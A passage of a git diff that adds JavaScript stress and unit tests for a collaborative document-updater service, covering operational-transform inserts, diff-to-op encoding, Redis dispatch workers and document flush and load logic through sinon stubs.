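+// Stress test for the document updater: each StressTestClient repeatedly
+// inserts a single character into a shared doc, listens for the applied ops
+// of the other clients, and periodically checks its local copy of the
+// content against the server's (see the argv parsing further down):
+//
+//   node run.js <client_count> <update_delay_ms> <sample_interval_ms> <project_id:doc_id> ...
+//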
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const DocUpdaterClient = require('../../acceptance/js/helpers/DocUpdaterClient') +// MockWebApi = require "../../acceptance/js/helpers/MockWebApi" +const assert = require('node:assert') +const async = require('async') + +const insert = function (string, pos, content) { + const result = string.slice(0, pos) + content + string.slice(pos) + return result +} + +const transform = function (op1, op2) { + if (op2.p < op1.p) { + return { + p: op1.p + op2.i.length, + i: op1.i, + } + } else { + return op1 + } +} + +class StressTestClient { + constructor(options) { + if (options == null) { + options = {} + } + this.options = options + if (this.options.updateDelay == null) { + this.options.updateDelay = 200 + } + this.project_id = this.options.project_id || DocUpdaterClient.randomId() + this.doc_id = this.options.doc_id || DocUpdaterClient.randomId() + this.pos = this.options.pos || 0 + this.content = this.options.content || '' + + this.client_id = DocUpdaterClient.randomId() + this.version = this.options.version || 0 + this.inflight_op = null + this.charCode = 0 + + this.counts = { + conflicts: 0, + local_updates: 0, + remote_updates: 0, + max_delay: 0, + } + + DocUpdaterClient.subscribeToAppliedOps((channel, update) => { + update = JSON.parse(update) + if (update.error != null) { + console.error(new Error(`Error from server: '${update.error}'`)) + return + } + if (update.doc_id === this.doc_id) { + return this.processReply(update) + } + }) + } + + sendUpdate() { + const data = String.fromCharCode(65 + (this.charCode++ % 26)) + this.content = insert(this.content, this.pos, data) + this.inflight_op = { + i: data, + p: this.pos++, + } + this.resendUpdate() + return (this.inflight_op_sent = Date.now()) + } + + resendUpdate() { + assert(this.inflight_op != null) + DocUpdaterClient.sendUpdate(this.project_id, this.doc_id, { + doc: this.doc_id, + op: [this.inflight_op], + v: this.version, + meta: { + source: this.client_id, + }, + dupIfSource: [this.client_id], + }) + return (this.update_timer = setTimeout(() => { + console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Resending update after 5 seconds` + ) + return this.resendUpdate() + }, 5000)) + } + + processReply(update) { + if (update.op.v !== this.version) { + if (update.op.v < this.version) { + console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Duplicate ack (already seen version)` + ) + return + } else { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] ERROR: Version jumped ahead (client: ${this.version}, op: ${ + update.op.v + })` + ) + } + } + this.version++ + if (update.op.meta.source === this.client_id) { + if (this.inflight_op != null) { + this.counts.local_updates++ + this.inflight_op = null + clearTimeout(this.update_timer) + const delay = Date.now() - this.inflight_op_sent + this.counts.max_delay = Math.max(this.counts.max_delay, delay) + return this.continue() + } else { + return console.log( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] WARN: Duplicate ack` + ) + } + } else { + assert(update.op.op.length === 1) + this.counts.remote_updates++ + let 
externalOp = update.op.op[0] + if (this.inflight_op != null) { + this.counts.conflicts++ + this.inflight_op = transform(this.inflight_op, externalOp) + externalOp = transform(externalOp, this.inflight_op) + } + if (externalOp.p < this.pos) { + this.pos += externalOp.i.length + } + return (this.content = insert(this.content, externalOp.p, externalOp.i)) + } + } + + continue() { + if (this.updateCount > 0) { + this.updateCount-- + return setTimeout( + () => { + return this.sendUpdate() + }, + this.options.updateDelay * (0.5 + Math.random()) + ) + } else { + return this.updateCallback() + } + } + + runForNUpdates(n, callback) { + if (callback == null) { + callback = function () {} + } + this.updateCallback = callback + this.updateCount = n + return this.continue() + } + + check(callback) { + if (callback == null) { + callback = function () {} + } + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error != null) { + throw error + } + if (body.lines == null) { + return console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] ERROR: Invalid response from get doc (${this.doc_id})`, + body + ) + } + const content = body.lines.join('\n') + const { version } = body + if (content !== this.content) { + if (version === this.version) { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] Error: Client content does not match server.` + ) + console.error(`Server: ${content.split('a')}`) + console.error(`Client: ${this.content.split('a')}`) + } else { + console.error( + `[${new Date()}] \t[${this.client_id.slice( + 0, + 4 + )}] Error: Version mismatch (Server: '${version}', Client: '${ + this.version + }')` + ) + } + } + + if (!this.isContentValid(this.content)) { + const iterable = this.content.split('') + for (let i = 0; i < iterable.length; i++) { + const chunk = iterable[i] + if (chunk != null && chunk !== 'a') { + console.log(chunk, i) + } + } + throw new Error('bad content') + } + return callback() + } + ) + } + + isChunkValid(chunk) { + const char = 0 + for (let i = 0; i < chunk.length; i++) { + const letter = chunk[i] + if (letter.charCodeAt(0) !== 65 + (i % 26)) { + console.error( + `[${new Date()}] \t[${this.client_id.slice(0, 4)}] Invalid Chunk:`, + chunk + ) + return false + } + } + return true + } + + isContentValid(content) { + for (const chunk of Array.from(content.split('a'))) { + if (chunk != null && chunk !== '') { + if (!this.isChunkValid(chunk)) { + console.error( + `[${new Date()}] \t[${this.client_id.slice(0, 4)}] Invalid content`, + content + ) + return false + } + } + } + return true + } +} + +const checkDocument = function (projectId, docId, clients, callback) { + if (callback == null) { + callback = function () {} + } + const jobs = clients.map(client => cb => client.check(cb)) + return async.parallel(jobs, callback) +} + +const printSummary = function (docId, clients) { + const slot = require('cluster-key-slot') + const now = new Date() + console.log( + `[${now}] [${docId.slice(0, 4)} (slot: ${slot(docId)})] ${ + clients.length + } clients...` + ) + return (() => { + const result = [] + for (const client of Array.from(clients)) { + console.log( + `[${now}] \t[${client.client_id.slice(0, 4)}] { local: ${ + client.counts.local_updates + }, remote: ${client.counts.remote_updates}, conflicts: ${ + client.counts.conflicts + }, max_delay: ${client.counts.max_delay} }` + ) + result.push( + (client.counts = { + local_updates: 0, + remote_updates: 0, + conflicts: 0, + max_delay: 0, + }) + ) + } + 
return result + })() +} + +const CLIENT_COUNT = parseInt(process.argv[2], 10) +const UPDATE_DELAY = parseInt(process.argv[3], 10) +const SAMPLE_INTERVAL = parseInt(process.argv[4], 10) + +for (const docAndProjectId of Array.from(process.argv.slice(5))) { + ;(function (docAndProjectId) { + const [projectId, docId] = Array.from(docAndProjectId.split(':')) + console.log({ projectId, docId }) + return DocUpdaterClient.setDocLines( + projectId, + docId, + [new Array(CLIENT_COUNT + 2).join('a')], + null, + null, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getDoc(projectId, docId, (error, res, body) => { + let runBatch + if (error != null) { + throw error + } + if (body.lines == null) { + return console.error( + `[${new Date()}] ERROR: Invalid response from get doc (${docId})`, + body + ) + } + const content = body.lines.join('\n') + const { version } = body + + const clients = [] + for ( + let pos = 1, end = CLIENT_COUNT, asc = end >= 1; + asc ? pos <= end : pos >= end; + asc ? pos++ : pos-- + ) { + ;(function (pos) { + const client = new StressTestClient({ + doc_id: docId, + project_id: projectId, + content, + pos, + version, + updateDelay: UPDATE_DELAY, + }) + return clients.push(client) + })(pos) + } + + return (runBatch = function () { + const jobs = clients.map( + client => cb => + client.runForNUpdates(SAMPLE_INTERVAL / UPDATE_DELAY, cb) + ) + return async.parallel(jobs, error => { + if (error != null) { + throw error + } + printSummary(docId, clients) + return checkDocument(projectId, docId, clients, error => { + if (error != null) { + throw error + } + return runBatch() + }) + }) + })() + }) + } + ) + })(docAndProjectId) +} diff --git a/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js b/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js new file mode 100644 index 0000000..5913c64 --- /dev/null +++ b/services/document-updater/test/unit/js/DiffCodec/DiffCodecTests.js @@ -0,0 +1,57 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/DiffCodec.js' +const SandboxedModule = require('sandboxed-module') + +describe('DiffCodec', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.DiffCodec = SandboxedModule.require(modulePath) + }) + + describe('diffAsShareJsOps', function () { + it('should insert new text correctly', function () { + this.before = ['hello world'] + this.after = ['hello beautiful world'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { + i: 'beautiful ', + p: 6, + }, + ]) + }) + + it('should shift later inserts by previous inserts', function () { + this.before = ['the boy played with the ball'] + this.after = ['the tall boy played with the red ball'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { i: 'tall ', p: 4 }, + { i: 'red ', p: 29 }, + ]) + }) + + it('should delete text correctly', function () { + this.before = ['hello beautiful world'] + this.after = ['hello world'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { + d: 'beautiful ', + p: 6, + }, + ]) + }) + + it('should shift later deletes by the first deletes', function () { + this.before = ['the tall boy played with the red ball'] + this.after = ['the boy played with the ball'] + const ops = this.DiffCodec.diffAsShareJsOp(this.before, this.after) + expect(ops).to.deep.equal([ + { d: 'tall ', p: 4 }, + { 
d: 'red ', p: 24 }, + ]) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js b/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js new file mode 100644 index 0000000..55b2f05 --- /dev/null +++ b/services/document-updater/test/unit/js/DispatchManager/DispatchManagerTests.js @@ -0,0 +1,198 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/DispatchManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('DispatchManager', function () { + beforeEach(function () { + let Timer + this.timeout(3000) + this.DispatchManager = SandboxedModule.require(modulePath, { + requires: { + './UpdateManager': (this.UpdateManager = {}), + '@overleaf/settings': (this.settings = { + redis: { + documentupdater: {}, + }, + }), + '@overleaf/redis-wrapper': (this.redis = {}), + './RateLimitManager': {}, + './Errors': Errors, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.callback = sinon.stub() + return (this.RateLimiter = { + run(task, cb) { + return task(cb) + }, + }) + }) // run task without rate limit + + return describe('each worker', function () { + beforeEach(function () { + this.client = { auth: sinon.stub() } + this.redis.createClient = sinon.stub().returns(this.client) + return (this.worker = this.DispatchManager.createDispatcher( + this.RateLimiter, + 0 + )) + }) + + it('should create a new redis client', function () { + return this.redis.createClient.called.should.equal(true) + }) + + describe('_waitForUpdateThenDispatchWorker', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.doc_key = `${this.project_id}:${this.doc_id}` + return (this.client.blpop = sinon + .stub() + .callsArgWith(2, null, ['pending-updates-list', this.doc_key])) + }) + + describe('in the normal case', function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArg(2) + return this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should call redis with BLPOP', function () { + return this.client.blpop + .calledWith('pending-updates-list', 0) + .should.equal(true) + }) + + it('should call processOutstandingUpdatesWithLock', function () { + return this.UpdateManager.processOutstandingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not log any errors', function () { + this.logger.error.called.should.equal(false) + return this.logger.warn.called.should.equal(false) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('with an error', function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArgWith(2, new Error('a generic error')) + return 
this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should log an error', function () { + return this.logger.error.called.should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe("with a 'Delete component' error", function () { + beforeEach(function () { + this.UpdateManager.processOutstandingUpdatesWithLock = sinon + .stub() + .callsArgWith(2, new Errors.DeleteMismatchError()) + return this.worker._waitForUpdateThenDispatchWorker(this.callback) + }) + + it('should log a debug message', function () { + return this.logger.debug.called.should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('pending updates list with shard key', function () { + beforeEach(function (done) { + this.client = { + auth: sinon.stub(), + blpop: sinon.stub().callsArgWith(2), + } + this.redis.createClient = sinon.stub().returns(this.client) + this.queueShardNumber = 7 + this.worker = this.DispatchManager.createDispatcher( + this.RateLimiter, + this.queueShardNumber + ) + this.worker._waitForUpdateThenDispatchWorker(done) + }) + + it('should call redis with BLPOP with the correct key', function () { + this.client.blpop + .calledWith(`pending-updates-list-${this.queueShardNumber}`, 0) + .should.equal(true) + }) + }) + }) + + return describe('run', function () { + return it('should call _waitForUpdateThenDispatchWorker until shutting down', function (done) { + let callCount = 0 + this.worker._waitForUpdateThenDispatchWorker = callback => { + if (callback == null) { + callback = function () {} + } + callCount++ + if (callCount === 3) { + this.settings.shuttingDown = true + } + return setTimeout(() => callback(), 10) + } + sinon.spy(this.worker, '_waitForUpdateThenDispatchWorker') + + this.worker.run() + + const checkStatus = () => { + if (!this.settings.shuttingDown) { + // retry until shutdown + setTimeout(checkStatus, 100) + } else { + this.worker._waitForUpdateThenDispatchWorker.callCount.should.equal( + 3 + ) + return done() + } + } + + return checkStatus() + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js b/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js new file mode 100644 index 0000000..e9d68ee --- /dev/null +++ b/services/document-updater/test/unit/js/DocumentManager/DocumentManagerTests.js @@ -0,0 +1,1355 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/DocumentManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') +const tk = require('timekeeper') + +describe('DocumentManager', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.Metrics = { + Timer: class Timer {}, + inc: sinon.stub(), + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.RedisManager = { + promises: { + clearUnflushedTime: sinon.stub().resolves(), + getDoc: sinon.stub(), + getPreviousDocOps: sinon.stub(), + putDocInMemory: sinon.stub().resolves(), + removeDocFromMemory: sinon.stub().resolves(), + renameDoc: sinon.stub().resolves(), + updateCommentState: sinon.stub().resolves(), + updateDocument: sinon.stub().resolves(), + }, + } + this.ProjectHistoryRedisManager = { + promises: { + queueOps: sinon.stub().resolves(), + queueResyncDocContent: sinon.stub().resolves(), + }, + } + 
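+    // stub of the persistence layer (the web API) that DocumentManager
+    // loads docs from and flushes docs to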
this.PersistenceManager = { + promises: { + getDoc: sinon.stub(), + setDoc: sinon.stub().resolves(), + }, + } + this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + } + this.DiffCodec = { + diffAsShareJsOp: sinon.stub(), + } + this.UpdateManager = { + promises: { + applyUpdate: sinon.stub().resolves(), + }, + } + this.RangesManager = { + acceptChanges: sinon.stub(), + deleteComment: sinon.stub(), + } + this.Settings = { + max_doc_length: 2 * 1024 * 1024, // 2mb + } + + this.DocumentManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': this.RedisManager, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + './PersistenceManager': this.PersistenceManager, + './HistoryManager': this.HistoryManager, + './Metrics': this.Metrics, + './DiffCodec': this.DiffCodec, + './UpdateManager': this.UpdateManager, + './RangesManager': this.RangesManager, + './Errors': Errors, + '@overleaf/settings': this.Settings, + }, + }) + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'doc-id-123' + this.user_id = 1234 + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.pathname = '/a/b/c.tex' + this.unflushedTime = Date.now() + this.lastUpdatedAt = Date.now() + this.lastUpdatedBy = 'last-author-id' + this.source = 'external-source' + this.historyRangesSupport = false + }) + + afterEach(function () { + tk.reset() + }) + + describe('flushAndDeleteDoc', function () { + describe('successfully', function () { + beforeEach(async function () { + this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves() + await this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + {} + ) + }) + + it('should flush the doc', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should remove the doc from redis', function () { + this.RedisManager.promises.removeDocFromMemory + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when a flush error occurs', function () { + beforeEach(async function () { + this.DocumentManager.promises.flushDocIfLoaded = sinon + .stub() + .rejects(new Error('boom!')) + await expect( + this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + {} + ) + ).to.be.rejected + }) + + it('should not remove the doc from redis', function () { + this.RedisManager.promises.removeDocFromMemory.called.should.equal( + false + ) + }) + + describe('when ignoring flush errors', function () { + it('should remove the doc from redis', async function () { + await this.DocumentManager.promises.flushAndDeleteDoc( + this.project_id, + this.doc_id, + { ignoreFlushErrors: true } + ) + this.RedisManager.promises.removeDocFromMemory.called.should.equal( + true + ) + }) + }) + }) + }) + + describe('flushDocIfLoaded', function () { + describe('when the doc is in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + }) + await this.DocumentManager.promises.flushDocIfLoaded( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from 
redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should write the doc lines to the persistence layer', function () { + this.PersistenceManager.promises.setDoc.should.have.been.calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy + ) + }) + }) + + describe('when the document is not in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: null, + version: null, + ranges: null, + }) + await this.DocumentManager.promises.flushDocIfLoaded( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not write anything to the persistence layer', function () { + this.PersistenceManager.promises.setDoc.called.should.equal(false) + }) + }) + }) + + describe('getDocAndRecentOps', function () { + describe('with a previous version specified', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + this.RedisManager.promises.getPreviousDocOps.resolves(this.ops) + this.result = await this.DocumentManager.promises.getDocAndRecentOps( + this.project_id, + this.doc_id, + this.fromVersion + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should get the doc ops', function () { + this.RedisManager.promises.getPreviousDocOps + .calledWith(this.doc_id, this.fromVersion, this.version) + .should.equal(true) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + }) + }) + + describe('with no previous version specified', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + this.RedisManager.promises.getPreviousDocOps.resolves(this.ops) + this.result = await this.DocumentManager.promises.getDocAndRecentOps( + this.project_id, + this.doc_id, + -1 + ) + }) + + it('should get the doc', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not need to get the doc ops', function () { + this.RedisManager.promises.getPreviousDocOps.called.should.equal(false) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ops: [], + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + }) + }) + }) + }) + + describe('getDoc', function () { + describe('when the doc exists in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: 
this.projectHistoryId, + unflushedTime: this.unflushedTime, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + historyRangesSupport: this.historyRangesSupport, + }) + this.result = await this.DocumentManager.promises.getDoc( + this.project_id, + this.doc_id + ) + }) + + it('should get the doc from Redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: true, + historyRangesSupport: this.historyRangesSupport, + }) + }) + }) + + describe('when the doc does not exist in Redis', function () { + beforeEach(async function () { + this.RedisManager.promises.getDoc.resolves({ + lines: null, + version: null, + ranges: null, + pathname: null, + projectHistoryId: null, + }) + this.PersistenceManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + }) + this.result = await this.DocumentManager.promises.getDoc( + this.project_id, + this.doc_id + ) + }) + + it('should try to get the doc from Redis', function () { + this.RedisManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should get the doc from the PersistenceManager', function () { + this.PersistenceManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should set the doc in Redis', function () { + this.RedisManager.promises.putDocInMemory + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport + ) + .should.equal(true) + }) + + it('should return doc info', function () { + expect(this.result).to.deep.equal({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: null, + alreadyLoaded: false, + historyRangesSupport: this.historyRangesSupport, + }) + }) + }) + }) + + describe('setDoc', function () { + describe('with plain tex lines', function () { + beforeEach(function () { + this.beforeLines = ['before', 'lines'] + this.afterLines = ['after', 'lines'] + this.ops = [ + { i: 'foo', p: 4 }, + { d: 'bar', p: 42 }, + ] + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: true, + }) + this.DiffCodec.diffAsShareJsOp.returns(this.ops) + this.DocumentManager.promises.flushDocIfLoaded = sinon.stub().resolves() + this.DocumentManager.promises.flushAndDeleteDoc = sinon + .stub() + .resolves() + }) + + describe('when not loaded but with the same content', function () { + beforeEach(async function () { + this.DiffCodec.diffAsShareJsOp.returns([]) + this.DocumentManager.promises.getDoc = 
sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + ranges: this.ranges, + resolvedCommentIds: this.resolvedCommentIds, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + unflushedTime: this.unflushedTime, + alreadyLoaded: false, + }) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.beforeLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should not apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'noop', + method: 'evict', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush and delete the doc from redis', function () { + this.DocumentManager.promises.flushAndDeleteDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when already loaded with the same content', function () { + beforeEach(async function () { + this.DiffCodec.diffAsShareJsOp.returns([]) + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.beforeLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should not apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'noop', + method: 'flush', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush the doc to Mongo', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when already loaded', function () { + beforeEach(async function () { + await this.DocumentManager.promises.setDoc( + this.project_id, + this.doc_id, + this.afterLines, + this.source, + this.user_id, + false, + true + ) + }) + + it('should get the current doc lines', function () { + this.DocumentManager.promises.getDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return a diff of the old and new lines', function () { + this.DiffCodec.diffAsShareJsOp + .calledWith(this.beforeLines, this.afterLines) + .should.equal(true) + }) + + it('should apply the diff as a ShareJS op', function () { + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, { + doc: this.doc_id, + v: this.version, + op: this.ops, + meta: { + type: 'external', + source: this.source, + user_id: this.user_id, + }, + }) + .should.equal(true) + }) + + it('should increment the external update metric', function () { + this.Metrics.inc + .calledWith('external-update', 1, { + status: 'diff', + method: 'flush', + path: this.source, + }) + .should.equal(true) + }) + + it('should flush the doc to Mongo', function () { + this.DocumentManager.promises.flushDocIfLoaded + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should not flush the project history', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal( + false + ) + }) + }) + + describe('when not already loaded', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc = sinon.stub().resolves({ + lines: this.beforeLines, + version: this.version, + pathname: this.pathname, + unflushedTime: null, + alreadyLoaded: false, + }) + 
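+          // the doc is not loaded in Redis, so this external update follows
+          // the evict path: apply the diff, then flush and delete the doc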
+          await this.DocumentManager.promises.setDoc(
+            this.project_id,
+            this.doc_id,
+            this.afterLines,
+            this.source,
+            this.user_id,
+            false,
+            true
+          )
+        })
+
+        it('should flush and delete the doc from the doc updater', function () {
+          this.DocumentManager.promises.flushAndDeleteDoc
+            .calledWith(this.project_id, this.doc_id, {})
+            .should.equal(true)
+        })
+
+        it('should increment the external update metric', function () {
+          this.Metrics.inc
+            .calledWith('external-update', 1, {
+              status: 'diff',
+              method: 'evict',
+              path: this.source,
+            })
+            .should.equal(true)
+        })
+
+        it('should flush the project history', function () {
+          this.HistoryManager.flushProjectChangesAsync
+            .calledWithExactly(this.project_id)
+            .should.equal(true)
+        })
+      })
+
+      describe('without new lines', function () {
+        beforeEach(async function () {
+          await expect(
+            this.DocumentManager.promises.setDoc(
+              this.project_id,
+              this.doc_id,
+              null,
+              this.source,
+              this.user_id,
+              false,
+              true
+            )
+          ).to.be.rejectedWith('No lines were provided to setDoc')
+        })
+
+        it('should not try to get the doc lines', function () {
+          this.DocumentManager.promises.getDoc.called.should.equal(false)
+        })
+      })
+
+      describe('with the undoing flag', function () {
+        beforeEach(async function () {
+          // Copy ops so we don't interfere with other tests
+          this.ops = [
+            { i: 'foo', p: 4 },
+            { d: 'bar', p: 42 },
+          ]
+          this.DiffCodec.diffAsShareJsOp.returns(this.ops)
+          await this.DocumentManager.promises.setDoc(
+            this.project_id,
+            this.doc_id,
+            this.afterLines,
+            this.source,
+            this.user_id,
+            true,
+            true
+          )
+        })
+
+        it('should set the undo flag on each op', function () {
+          this.ops.map(op => op.u.should.equal(true))
+        })
+      })
+
+      describe('with the external flag', function () {
+        beforeEach(async function () {
+          this.undoing = false
+          // Copy ops so we don't interfere with other tests
+          this.ops = [
+            { i: 'foo', p: 4 },
+            { d: 'bar', p: 42 },
+          ]
+          this.DiffCodec.diffAsShareJsOp.returns(this.ops)
+          await this.DocumentManager.promises.setDoc(
+            this.project_id,
+            this.doc_id,
+            this.afterLines,
+            this.source,
+            this.user_id,
+            this.undoing,
+            true
+          )
+        })
+
+        it('should add the external type to update metadata', function () {
+          this.UpdateManager.promises.applyUpdate
+            .calledWith(this.project_id, this.doc_id, {
+              doc: this.doc_id,
+              v: this.version,
+              op: this.ops,
+              meta: {
+                type: 'external',
+                source: this.source,
+                user_id: this.user_id,
+              },
+            })
+            .should.equal(true)
+        })
+      })
+
+      describe('without the external flag', function () {
+        beforeEach(async function () {
+          this.undoing = false
+          // Copy ops so we don't interfere with other tests
+          this.ops = [
+            { i: 'foo', p: 4 },
+            { d: 'bar', p: 42 },
+          ]
